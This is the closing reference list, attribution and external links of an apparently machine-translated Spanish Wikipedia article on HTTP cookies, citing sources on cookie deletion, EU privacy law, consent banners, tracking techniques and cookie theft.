  60. ^ "Borrado de datos privados" . Base de conocimientos de soporte de Firefox . Mozilla. 16 de septiembre de 2008. Archivado desde el original el 3 de enero de 2009 . Consultado el 4 de enero de 2009 .
  61. ^ "Borrar información personal: borrar datos de navegación" . Ayuda de Google Chrome . Archivado desde el original el 11 de marzo de 2009 . Consultado el 4 de enero de 2009 .
  62. ^ "Borrar información personal: eliminar cookies" . Ayuda de Google Chrome . Archivado desde el original el 11 de marzo de 2009 . Consultado el 4 de enero de 2009 .
  63. ^ "Compatibilidad del sitio para Firefox 22" , Mozilla Developer Network , 11 de abril de 2013, archivado desde el original el 27 de mayo de 2013 , consultado el 11 de abril de 2013
  64. ^ Miyazaki, Anthony D. (2008), "Privacidad en línea y la divulgación del uso de cookies: efectos sobre la confianza del consumidor y patrocinio anticipado", Journal of Public Policy & Marketing, 23 (primavera), 19-33
  65. ^ "La CIA atrapó galletas furtivas" . CBS News . 20 de marzo de 2002. Archivado desde el original el 26 de agosto de 2011 . Consultado el 2 de enero de 2006 .
  66. ^ "Agencia de espías elimina archivos de seguimiento ilegal" . New York Times . 29 de diciembre de 2005. Archivado desde el original el 26 de agosto de 2011 . Consultado el 19 de febrero de 2017 .
  67. ^ "Directiva de cookies de la UE, Directiva 2009/136 / EC" . Información legal JISC. Archivado desde el original el 18 de diciembre de 2012 . Consultado el 31 de octubre de 2012 .
  68. ^ a b Reglamentos de privacidad y comunicaciones electrónicas . Oficina del Comisionado de Información. 2012. Archivado desde el original el 30 de octubre de 2012 . Consultado el 31 de octubre de 2012 .
  69. ^ "Cookies y tecnologías similares" . ico.org.uk . 1 de enero de 2021 . Consultado el 6 de junio de 2021 .
  70. ^ a b "EUR-Lex - 62017CN0673 - ES - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  71. ↑ a b Veale, Michael; Zuiderveen Borgesius, Frederik (1 de abril de 2021). "Adtech y Real-Time Bidding bajo la Ley Europea de Protección de Datos" . doi : 10.31235 / osf.io / wg8fq . Cite journal requiere |journal=( ayuda )
  72. ^ Zuiderveen Borgesius, Frederik J. (agosto de 2015). "Tratamiento de datos personales para la segmentación por comportamiento: ¿qué base jurídica?" . Ley internacional de privacidad de datos . 5 (3): 163-176. doi : 10.1093 / idpl / ipv011 . ISSN 2044-3994 . 
  73. ^ a b c d Nouwens, Midas; Liccardi, Ilaria; Veale, Michael; Karger, David; Kagal, Lalana (21 de abril de 2020). "Patrones oscuros después del RGPD: raspar las ventanas emergentes de consentimiento y demostrar su influencia" . Actas de la Conferencia CHI 2020 sobre factores humanos en sistemas informáticos . Honolulu HI USA: ACM: 1–13. arXiv : 2001.02479 . doi : 10.1145 / 3313831.3376321 . hdl : 1721,1 / 129999 . ISBN 978-1-4503-6708-0. S2CID  210064317 .
  74. ^ a b "EUR-Lex - 32016R0679 - ES - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  75. ^ a b Oficina del comisionado de información (2019). Informe de actualización en Adtech y Ofertas en tiempo real (PDF) .
  76. ^ www.legifrance.gouv.fr https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000038783337 . Consultado el 6 de junio de 2021 . Falta o vacío |title=( ayuda )
  77. ^ "EUR-Lex - 62017CC0040 - ES - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  78. ^ "Ley de cookies de la UE: deje de lloriquear y siga adelante" . Reino Unido cableado . 24 de mayo de 2012. Archivado desde el original el 15 de noviembre de 2012 . Consultado el 31 de octubre de 2012 .
  79. ^ Kampanos, Georgios; Shahandashti, Siamak F. (2021). "Aceptar todo: el panorama de los banners de cookies en Grecia y el Reino Unido". Seguridad de los sistemas de TIC y protección de la privacidad . Cham: Springer International Publishing. págs. 213-227. arXiv : 2104.05750 . doi : 10.1007 / 978-3-030-78120-0_14 . ISBN 978-3-030-78119-4. ISSN  1868-4238 .
  80. ^ Santos, Cristiana; Nouwens, Midas; Toth, Michael; Bielova, Natalia; Roca, Vincent (2021), Gruschka, Nils; Antunes, Luís Filipe Coelho; Rannenberg, Kai; Drogkaris, Prokopios (eds.), "Plataformas de gestión de consentimiento bajo el RGPD: ¿Procesadores y / o controladores?" , Política y tecnologías de privacidad , Cham: Springer International Publishing, 12703 , págs. 47–69, arXiv : 2104.06861 , doi : 10.1007 / 978-3-030-76663-4_3 , ISBN 978-3-030-76662-7, S2CID  233231428 , consultado el 6 de junio de 2021
  81. ^ a b "Una escapatoria lo suficientemente grande como para que quepa una galleta" . Bits . Los New York Times. 17 de septiembre de 2010. Archivado desde el original el 26 de enero de 2013 . Consultado el 31 de enero de 2013 .
  82. J Zuiderveen Borgesius, F .; Kruikemeier, S .; C Boerman, S .; Helberger, N. (2017). "Muros de seguimiento, opciones de Tómelo o déjelo, el GDPR y el Reglamento de privacidad electrónica" . Revista de la ley europea de protección de datos . 3 (3): 353–368. doi : 10.21552 / edpl / 2017/3/9 .
  83. ^ "Directrices 05/2020 sobre consentimiento en virtud del Reglamento 2016/679 | Junta Europea de Protección de Datos" . edpb.europa.eu . Consultado el 6 de junio de 2021 .
  84. ^ Pegoraro, Rob (17 de julio de 2005). "Cómo bloquear las cookies de seguimiento" . Washington Post . pag. F07. Archivado desde el original el 27 de abril de 2011 . Consultado el 4 de enero de 2009 .
  85. ^ Francisco, Thomas Claburn en San. "¿Qué es CNAME de tu juego? Este seguimiento basado en DNS desafía las defensas de privacidad de tu navegador" . www.theregister.com . Consultado el 6 de junio de 2021 .
  86. ^ Dimova, Yana; Acar, Gunes; Olejnik, Lukasz; Joosen, Wouter; Van Goethem, Tom (5 de marzo de 2021). "El CNAME del juego: análisis a gran escala de la evasión de seguimiento basada en DNS". arXiv : 2102.09301 [ cs.CR ].
  87. ^ Wired Hack obtiene 9 certificados falsos para sitios web prominentes Archivado 2014-03-26 en Wayback Machine
  88. ↑ a b c Finkle, Jim (25 de mayo de 2011). "Riesgo de seguridad más reciente de Microsoft: 'Cookiejacking ' " . Reuters . Archivado desde el original el 30 de mayo de 2011 . Consultado el 26 de mayo de 2011 .
  89. ^ Whitney, Lance (26 de mayo de 2011). "Investigador de seguridad encuentra riesgo de 'cookiejacking' en IE" . CNET . Archivado desde el original el 14 de junio de 2011 . Consultado el 6 de septiembre de 2019 .
  90. ^ Fielding, Roy (2000). "Disertación de campo: CAPÍTULO 6: Experiencia y evaluación" . Archivado desde el original el 27 de abril de 2011 . Consultado el 14 de octubre de 2010 .
  91. ^ Tilkov, Stefan (2 de julio de 2008). "DESCANSO Anti-Patrones" . InfoQ. Archivado desde el original el 23 de diciembre de 2008 . Consultado el 4 de enero de 2009 .
  92. ^ Hoffman, Chris. "¿Qué es una cookie del navegador?" . How-To Geek . Consultado el 3 de abril de 2021 .
  93. ^ "ThomasFrank.se" . ThomasFrank.se. Archivado desde el original el 15 de mayo de 2010 . Consultado el 22 de mayo de 2010 .
  94. ^ "La cookie está muerta. Así es como Facebook, Google y Apple te están rastreando ahora, VentureBeat, Mobile, por Richard Byrne Reilly" . VentureBeat . 6 de octubre de 2014. Archivado desde el original el 24 de julio de 2017 . Consultado el 31 de agosto de 2017 .
  95. ^ "Window.sessionStorage, API web | MDN" . developer.mozilla.org . Archivado desde el original el 28 de septiembre de 2015 . Consultado el 2 de octubre de 2015 .
  96. ^ "Introducción a la persistencia" . microsoft.com . Microsoft. Archivado desde el original el 11 de enero de 2015 . Consultado el 9 de octubre de 2014 .
  97. ^ "Almacenamiento aislado" . Microsoft.com . Archivado desde el original el 16 de diciembre de 2014 . Consultado el 9 de octubre de 2014 .
  98. ^ "BrowserSpy" . gemal.dk. Archivado desde el original el 26 de septiembre de 2008 . Consultado el 28 de enero de 2010 .
  99. ^ "IE" comportamientos predeterminados [sic] "pruebas de divulgación de información del navegador: clientCaps" . Mypage.direct.ca. Archivado desde el original el 5 de junio de 2011 . Consultado el 28 de enero de 2010 .
  100. ^ Eckersley, Peter (17 de mayo de 2010). "¿Qué tan exclusivo es su navegador web?" (PDF) . eff.org . Fundación Frontera Electrónica. Archivado desde el original (PDF) el 15 de octubre de 2014 . Consultado el 23 de julio de 2014 .

Este artículo se basa en material extraído del Diccionario gratuito de informática en línea antes del 1 de noviembre de 2008 e incorporado bajo los términos de "renovación de licencias" de la GFDL , versión 1.3 o posterior.

Fuentes

  • Anónimo, 2011. Un ataque de robo de cookies roba las credenciales de acceso al sitio web. Informationweek - Online, págs. Informationweek - Online, 26 de mayo de 2011.

enlaces externos

Escuche este artículo ( 1 hora y 1 minuto )
Icono de Wikipedia hablado
Este archivo de audio se creó a partir de una revisión de este artículo con fecha del 28 de mayo de 2016 y no refleja ediciones posteriores. ( 28 de mayo de 2016 )
  • RFC 6265, la especificación oficial actual para cookies HTTP
  • Cookies HTTP , Red de desarrolladores de Mozilla
  • Uso de cookies a través de ECMAScript , Mozilla Developer Network
  • Cómo funcionan las cookies de Internet en HowStuffWorks
  • Cookies en el Centro de Información de Privacidad Electrónica (EPIC)
  • Base de conocimientos de Mozilla: Cookies
  • Dominio de cookies, explique en detalle cómo se manejan los dominios de cookies en los principales navegadores actuales
  • Robo de galletas - Michael Pound
  • Verifique que las cookies cumplan con la directiva de cookies de la UE
Obtenido de " https://en.wikipedia.org/w/index.php?title=HTTP_cookie&oldid=1032666011 "